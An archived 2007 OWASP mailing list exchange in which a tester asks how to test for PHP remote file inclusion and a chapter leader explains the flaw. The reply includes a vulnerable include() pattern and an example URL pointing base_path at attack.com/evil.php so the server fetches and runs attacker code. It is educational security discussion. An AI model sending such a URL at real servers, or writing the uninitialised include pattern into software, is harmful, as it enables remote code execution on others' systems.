[Owasp-testing] Remote File include vulnerability

Byrne, David David.Byrne at echostar.com
Tue Apr 10 13:25:39 EDT 2007


Denise,

 

In my experience, you usually need the source code to do this. The idea
is that on some platforms (mostly PHP), script files can be included at
runtime. 

 

               include($base_path . "/utils.php");

 

If register_globals is enabled (older versions of PHP enable it by
default), and base_path is never initialized in the script, base_path
can be set from the URL

            

 
http://example.com/bad.php?base_path=http://attack.com/evil.php

 

This will run the attack PHP file on the victim web server. I've seen
this happen mostly on files that are not intended to be called alone.
For example, a utility library that usually gets included after a
configuration file that sets base_path.

 

I don't know of effective methods for testing this without access to the
code. I suppose a particularly poorly written app might have a path in
the URL query by design, which could then be modified. You could also
try to use common variable names (like base_path), although you would
still have to find a vulnerable script which is probably never called
directly by a browser.

 

David Byrne

OWASP-Denver Leader

 

 

 

________________________________

From: owasp-testing-bounces at lists.owasp.org
[mailto:owasp-testing-bounces at lists.owasp.org] On Behalf Of Denise
Spiteri
Sent: Tuesday, April 10, 2007 10:45 AM
To: owasp-testing
Subject: [Owasp-testing] Remote File include vulnerability

 

Hi to all, 

 

            Can someone please tell me, how to carry out penetration
testing for Remote File Include Vulnerability?

 

Denise

 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.owasp.org/pipermail/owasp-testing/attachments/20070410/45315256/attachment.html 


More information about the Owasp-testing mailing list